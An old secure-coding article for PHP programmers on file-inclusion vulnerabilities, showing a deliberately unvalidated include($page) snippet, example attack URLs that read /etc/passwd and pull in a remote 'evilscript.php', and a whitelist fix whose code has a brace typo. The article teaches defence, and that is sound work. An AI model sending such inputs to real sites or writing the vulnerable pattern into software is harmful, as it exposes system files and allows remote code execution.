PHP Security Mistakes

Dec 02, 2008 Author: City Hall

The purpose of this document is to inform PHP programmers of common security mistakes that can be overlooked in PHP scripts. While many of the following concepts may appear to be common sense, they are unfortunately not always common practice. After applying the following practices to your coding, you will be able to eliminate the vast majority of security holes that plague many scripts. Many of these security holes have been found in widely-used open source and commercial PHP scripts in the past. The most important concept to learn from this article is that you should never trust the user to input exactly what is expected. The way most PHP scripts are compromised is by entering unexpected data to exploit security holes inadvertantly left in the script. 1. Never include, require, or otherwise open a file with a filename based on user input, without thoroughly checking it first. Take the following example: if(isset($page)) { include($page); } Since there is no validation being done on $page, a malicious user could hypothetically call your script like this (assuming register_globals is set to ON): script.php?page=/etc/passwd Therefore causing your script to include the servers /etc/passwd file. When a non PHP file is include()'d or require()'d, it's displayed as HTML/Text, not parsed as PHP code. On many PHP installations, the include() and require() functions can include remote files. If the malicious user were to call your script like this: script.php?page=http://mysite.com/evilscript.php He would be able to have evilscript.php output any PHP code that he or she wanted your script to execute. Imagine if the user sent code to delete content from your database or even send sensitive information directly to the browser. Solution: validate the input. One method of validation would be to create a list of acceptable pages. If the input did not match any of those pages, an error could be displayed. $pages = array('index.html', 'page2.html', 'page3.html'); if( in_array($page, $pages) ) { include($page); { else { die("Nice Try."); } Continue


views 7387
  1. Add New Comment